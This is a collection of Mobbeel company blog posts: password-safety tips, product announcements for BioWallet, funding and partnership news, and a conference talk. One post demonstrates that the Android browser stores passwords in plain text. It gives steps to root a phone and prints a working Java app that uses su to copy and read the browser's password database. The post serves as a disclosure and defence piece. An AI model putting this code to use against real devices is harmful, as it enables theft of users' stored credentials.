The latest analysis performed by ZoneAlarm warns us of some shocking facts. 79 % of internet users use unsecure passwords and 16 % create passwords from people’s first names. This report says that the most used password is ’123456′, closely followed by ’12345′, ’123456789′ and irrespective of which language you use, the next most common password that was identified was ‘password’ ( 密码 in chinese, пАРОЛЬ in russian).I´m sure that you have often thought : “Why should I complicate my life thinking up a safe password, that I will never be able to remember, if no one actually is interested in my account”.

This same fake feeling of safeness is starting to affect a lot of celebrities that have been suffering leaks of private information from their accounts.

The first real case of ‘cyber-attack’ against a ‘celebrity’ was in 2005, when hackers obtained access to Paris Hilton’s cell phone and distributed private and compromising photos of her. Mikko Hypponen, chief of investigation of F-Secure, an IT security company, said that hackers found the answer to her not-so-secret security question, which was ‘Tinkerbell’, the name of her Chihuahua.

In December 2010, two young amateur hackers get access to the email accounts and photos of more than 50 ‘celebrities’, including Lady Gaga, Ke$ha or Justin Timberlake. In this case, they only used simple ‘Trojans’ and a lot of pacience to break into their accounts.

In March 2011, Vanessa Hudgens, from ‘High School Musical’, reported that some photos had been stolen from her Gmail account.

In April 2011, Wayne Rooney announced on Twitter that his cell phone had been hacked. He reported the incident to Scotland Yard and the resulting investigation confirmed that the newspaper ‘News of the World’ had intercepted his private conversations, which led to them publishing damaging details about the English striker’s infidelity with a prostitute.

In August 2011, the rapper Kreayshawn posted on her blog that her Twitter account had been hacked when some photos of her naked appeared.

In September 2011, Scarlett Johansson and Mila Kunis were victims of phone hacking.
This Wednesday, Christopher Chaney was arrested by Los Angeles FBI thanks to the ‘Hackerazzi’ operation. The 35-year-old suspect lives in Florida and had illegal access to the accounts of at least 50 famous people, among which Christina Aguilera, Scarlett Johansson, Mila Kunis, Simone Harouche and Renee Olstead among others.

one thing is sure, this kind of hacking against celebrities is not going to disappear. ‘This is on the rise’, said Hypponen. ‘When people see what happened with Scarlett Johansson, you can bet that we are going to find more hackers outside that are trying to do the same with other beautiful actresses’.

This statement of Hypponen leads us to the question. ‘How long before this trend extends beyond famous people?’

Here are a few tips you can follow to safeguard your accounts:

Use a good password manager to keep all your passwords safe.

Use a password generator, it doesn´t matter if you don´t remember your password because the password manager will remember it for you.

Keep all your private information in a real safe place, using advanced security techniques such as Biometrics (iris, signature recognition).

If all of the above doesn´t convince you, you can always delete all your private information. Although that may be a bit complicated due to the amount of sensitive documents that we save on our computer’s and cell phone’s these days.

If, like us, you are convinced that your private information should remain private, you can download BioWallet Signature from the Android Market and save all your documents and passwords securely thanks to signature recognition technology. And if you complement it with Biowallet2Browser, you could send your saved accounts from BioWallet to your browser and login from your computer without fear of being hacked.

One final suggestion, don’t take naked pictures of yourself on your phone!

Mobbeel, Extremadura Avante and CDTI has announced that Mobbeel closed its first round of funding totaling €0.5M.

The funding will enable Mobbeel to improve the current state of its biometric recognition technologies (iris, handwritten signature and voice), research and develop new ones such as face and hand geometry recognition as well as positioning the company for continued growth and future investment.

Part of the funding has been received from the Spanish CDTI NEOTEC program. The CDTI (Centre for Industrial Technological Development) is a public company which is affiliated with the Spanish Ministry of Science and Innovation. NEOTEC supports the creation and consolidation of new spanish technology companies.

Extremadura Avante has also invested in this seed round. Extremadura Avante is a public enterprise of the regional goverment of Extremadura whose aim is it to lend funds as well as making equity investments. Its objective is to support important local businesses in surviving and growing in the economic crisis.

Mobbeel is pleased to present a new product specially designed to ease and secure your browsing experience on the Internet. It is called BioWallet2Browser and we think you’ll like it.

BioWallet2Browser lets you store your passwords on your phone and use them anywhere with a browser. BioWallet2Browser allows you to surf the web from your desktop browser safely, without having to remember any passwords. Your info is only stored on your phone (inside BioWallet). The browser (only Google Chrome for now) will connect with your phone requesting the user/pass for the site you are visiting, and BioWallet will send this data back to the browser. Easy and secure! You can also store new user/pass information in BioWallet Signature on your phone, directly from the browser.

With BioWallet2Browser you can:

• Store your passwords on your phone using BioWallet Signature..
• Access them anywhere you want from a browser.
• Protect your passwords and sensitive information using biometric encryption on your phone.
• Save new passwords automatically
• ...
• more features

BioWallet2Browser is in Beta and you can try it for free.

All the information is available here.
Go ahead and Try it for free!


Let us know what you think about BioWallet2Browser. You can do so through twitter/biowallet, using our userEcho or by mail to info(at)mobbeel(dot)com

Demonstration Video

In this video you can see how BioWallet2Browser works and check out how easy and convenient browsing in a secure way is without having to remember a series of different, long or randomized passwords.

We’re pleased to announce that BioWallet Signature has been updated to 1.0 version.

The v1.0 version includes these major changes:

• Attachments. Now you can export/import all your attachments (photos, videos) and create full back-up copies.
• Protect your exported files with a password.
• Enable invisible signature. Nobody will see how you sign.
• Enable/Disable Password Access to the application.
• Disable your signature's template adaptation once you feel comfortable with your signature.
• BioWallet2Browser Compatible.

With the new version of BioWallet Signature you can access, save and use all your passwords directly from your browser. Find out more here.

If you have any comments, suggestions, criticism or you want some new features in BioWallet Signature, please let us know. You can do so through twitter/biowallet, using our userEcho or by mail to info(at)mobbeel(dot)com

You can download the application directly from the Android Market, from the download section or scanning the QRCode below …

One of the cornerstones on which the Android security model is based is that an user application cannot read or write the files of other applications. To that end, Android uses the Linux permission model and it assigns each application its own user id. This way, it avoids (in theory) that our application’s data can be accessed by third party applications or that we can access data from them.

This model works perfectly as long as there is not a “superuser” present on the phone with access to the whole file system (the famous “root”). By default, most of the Android phones that are released to the market don’t have this root user (with some exceptions like the GeeksPhone One), but we have all seen that some methods have been developed to gain root access to each and every of these phones. Lately, it has become such an easy task that, in many phones, installing an application and clicking a button is all you need to get it.

Most of the times, users gain root access to their devices to be able to install customized ROMs, use applications that need access to protected areas of the system, etc. but they don’t realize the security risks this involves.

One of the latest security risks that have been known is that, several applications, including the email client and the browser, store the user passwords without any kind of encryption. They do it because they are trusting the default Android security that ensures no other applications will be able to read or write these files. However, as we have seen before, gaining root access in most of the current devices is so easy that this security measure is clearly insufficient.

Some people could be thinking that this is just a simple oversight or lazyness of these applications’ programmers and that it can be easily solved just encrypting that information, but it is not so easy. In fact, is just a balance between convenience and security. To protect these passwords we would need an additional password to encrypt/decrypt them. And… how is this password stored? In plain text? Encrypted? If we encrypt it we would need again a new password but… what are we going to do with the password that encrypt the password that encrypt the passwords? At the end you need that the user enters something that cannot be stored on the system and that only he/she knows (or a biometric feature like the ones that BioWallet requires).

Several methods to exploit this security breach have been published on different blogs. Most of them require a rooted phone, connecting the phone to a computer and activating the debug mode, extracting the database from the phone and opening it with specific tools, etc. This causes a false security sensation on the less experimented users, because they think:

1. My phone is not rooted and so it is safe.
2. Mi phone is rooted, but to find out my passwords somebody should stole it and the attacker should be almost an expert hacker.

Actually, the security risk is greater than what most users think, because:

1. If your phone is not rooted but it is lost or stolen, gaining root access is a matter of minutes even for a non-expert person.
2. If your phone is already rooted it is not neccessary that somebody steal it and connect it to a computer. Every application you install could be a malicious one, access your passwords and send them to anywhere and you wouldn’t notice it.

To prove that this is a real security risk, now we are going to show how to gain root access to a mobile phone in a matter of seconds and we are going to present a sample application that, in a few lines of code, is able to access the browser stored passwords and display them on the screen.

How to get root access on the Motorola Droid

We can suppose somebody has got my Motorola Droid which I consider very secure because I never have activated the root access. The attacker only has to:

1. Download and install the UniversalAndroot directly from the phone (there are a lot more, this is just one of the most known ones).
2. Open the UniversalAndroot and click the button “Go Root”.



3. That’s all! The user now is root on our phone and could have access to all the passwords that have been stored in plain text.

PasswordsExploit

In the event that we already have rooted our own phone, the risk is even higher, because a malicious app might request superuser permission with a different pretext and, if we allow it, the application could access the stored passwords and send them everywhere without our consent. To show that it is very easy to create such application and you don’t need to be a security expert, we are presenting a sample that, in a few lines is able to access your passwords and display them on the screen (a real malicious application of course wouldn’t display them but it would silently send them outside the phone).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

package com.mobbeel.passwordsexploit;
 
import java.io.DataOutputStream;
import java.io.IOException;
 
import android.app.ListActivity;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.os.Bundle;
import android.widget.ListAdapter;
import android.widget.SimpleCursorAdapter;
import android.widget.Toast;
 
public class PasswordsExploitActivity extends ListActivity {
 
	@Override
	public void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
 
		try {
			//Get root access
			Process process = Runtime.getRuntime().exec("su");
			DataOutputStream os = new DataOutputStream(process.getOutputStream());
			//copy the browser database to a readable directory
			os.writeBytes("cp /data/data/com.android.browser/databases/webview.db /tmp \n");
			//change the permissions to be readable by everybody
			os.writeBytes("chmod 666 /tmp/webview.db \n");
			os.writeBytes("exit\n");
			os.flush();
			process.waitFor();
 
			//end of root commands. Now just open the database and query as usual
			SQLiteDatabase db = SQLiteDatabase.openDatabase("/tmp/webview.db", null, SQLiteDatabase.OPEN_READONLY);
			//SELECT * FROM password;
			Cursor c = db.query("password", null, null,	null, null, null, null);
			startManagingCursor(c);
 
			//display Usernames and Passwords on a list
			ListAdapter adapter = new SimpleCursorAdapter(this,
					android.R.layout.two_line_list_item, c,
					new String[] { "username", "password" },
					new int[] { android.R.id.text1, android.R.id.text2 });
			setListAdapter(adapter);
 
 
		} catch (IOException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		} catch (InterruptedException e) {
			Toast.makeText(this, "This app needs root access.", Toast.LENGTH_SHORT).show();
			e.printStackTrace();
		}
 
	}
}

When we execute this application, if we have already rooted our phone, it will request a permission to execute commands as a superuser. We never should give this permission to applications unless we absolutely trust them.

If we grant this permission, the application reads the usernames/passwords stored by the browser and display them on a list.

As a conclusion, we could give some recommendations to ensure your passwords are safe:

1. Don’t root your phone unless you are an experimented user and you know perfectly the security risks you are assuming.
2. In the event you have already rooted your phone, don’t allow supeuser permission to third party applications that might request it unless you absolutely trust them.
3. Don’t use the option to remember passwords in the browser or any other application that doesn’t protect them with another password (or a biometric feature like BioWallet). You should follow this advice not only for the Android browser, but also for your computer browsers, instant messaging clients, …. As a rule of thumb, every application that is able to access stored password without asking for your identification is because it’s not storing them on a secure way.
4. Use a reliable password manager to store your sensitive information.

We are pleased to announce that Mobbeel and Alcatel has come to an agreement so BioWallet Signature is pre-installed in the new Android device that Alcatel is going to put on the market, the Alcatel OT-980.

With BioWallet you could keep all your sensitive information safe. Don’t worry if the device is lost or stolen, no one but you could access with your signature.

The new Alcatel comes with Android 2.1 Éclair Operation System, and its main features are:

• 2.8” touch screen
• Full QWERTY keypad
• Compatibility with 2G / 3G / Wi-Fi mobile networks
• GPS navigation
• 2 MP digital camera with sensor ensuring superior image quality
• Media player with 3.5 mm audio jack
• Electronic compass
• Internal memory extendable up to 16GB
• Long-life battery with 6h talk time in 3G
• …

OT-980 is currently available in UK and will be in November in France, Spain and Germany

The terms of the agreement between Alcatel and Mobbeel will let you update BioWallet Signatures automatically through the Android Market.

Remember, with BioWallet You are the Key!

Stay tuned! The best is yet to come.

Mobbeel has been invited to give a talk in Biometric Exhibition Conference 2010 at London in October. You can see the event’s programme here.

Our CEO, José Luis Huertas, will talk about mobile biometry. His talk “Mobile biometry: Strengthening the weakest link” will discuss the use of biometrics to secure and reinforce security systems in a mobile environment.

We will be part of MOBIO’s panel, one of the exhibitors of the Conference.

If you want to organize a meeting with Mobbeel during the event please contact us here or through twitter/biowallet.

About Biometric Exhibition Conference 2010
Main Conference’s topics of this year:

• Biometric citizen identification issues
• Biometrics at the border
• Biometrics within military operations
• Automated border control
• Emerging biometric applications
• Enhancing law enforcement – biometrics in action
• …

About MOBIO

MOBIO is a FP7 European research project (FP7-2007-ICT-1) planned over 3 years and started in January 2008. The goal of MOBIO is to develop new mobile services secured by biometric authentication means. Scientific and technical objectives include robust-to-illumination face authentication, robust-to-noise speaker authentication, joint bi-modal authentication, model adaptation and scalability

Hi everyone,

We are more than happy to present to you our new re-designed website which is available in both English and Spanish.

You can access to information on our technology information as well as our products, learn more about the company and its advisors and it’s partner’s program.

Send us feedback about the product directly with the userEcho’s widget in the biowallet’s page.

We’re working very hard to deliver biometric cutting edge technologies for mobile devices…so stay tuned! There are some surprises to come…

Remember you can contact with us using this page, twitter or send feedback using our channel from userEcho.

Mobbeel is proud to be part of this campaign and thereby to contribute to the improvement of the image that exists of Extremadura.

The new campaign is now available at todossomosextremadura, 19 interviews have been recorded to describe personal and professional experiences in Extremadura.

Click here to view the video in todossomosextremadura about Mobbeel.

What is Marca Extremadura?

Extremadura is leading a process involving significant structural changes that are fuelling a boom in the region. This growth, alongside the dynamic nature of the Extremadurean people and the constant innovation and excellence as the cornerstones of progress, is drawing attention to the region as one of the most attractive places to invest.

In this context, the image of the region has been repositioned and transformed by the Extremadura Brand, which since 2006 has been based on the passion and clear identity that have seen it become the hallmark of Extremadura.
This has firmly established the region as a quality, trustworthy and innovative destination and The Extremadura Brand lends a clear and positive reputation to the region, its value opens up Extremadura to the rest of the world and vice-versa. In an increasingly competitive and globalised world, the importance of an image portraying Extremadura as a strong region is an extra bonus in terms of competitiveness in exports and is also an excellent tool for driving internationalisation.

Marca Extremadura is the global project that combines collective projects and the participation of agencies that wish to make a prominent contribution to the wellbeing of society as a whole. Contributions are active and voluntary, generating an explicit commitment which stems from their support and involvement in the process of repositioning Extremadura’s image.

Companies, institutions, agencies and civilians play an active role in overcoming the challenges involved in making the Extremadura brand strong.

The v0.5.2 version includes these changes:

• New translations added. Enjoy it now on English, Spanish, French, Dutch, German, Chinese, Polish, Russian and Italian
• New credit card layout. New design... check out here
• Attachments. Take a photo and attach it directly from a record.
• No more "System Tools" permission needed.
• New SplashID record. SplashID "Phone Numbers" record importing supported.
• Enrollment/Authentication. Revamped Enrollment and Authentication processes. Now it is a completely intuitive process.
• Sound Notifications. Now you can completely disable sound notifications in app's settings.
• Bugs fixed from previous versions

You can download the application directly from de Android Market (searching "biowallet" or from the its page

If you have any comments, suggestion, critic or you missed some feature in BioWallet, please let us know. You can do it through twitter/biowallet, using our userEcho or by mail to info(at)mobbeel(dot)com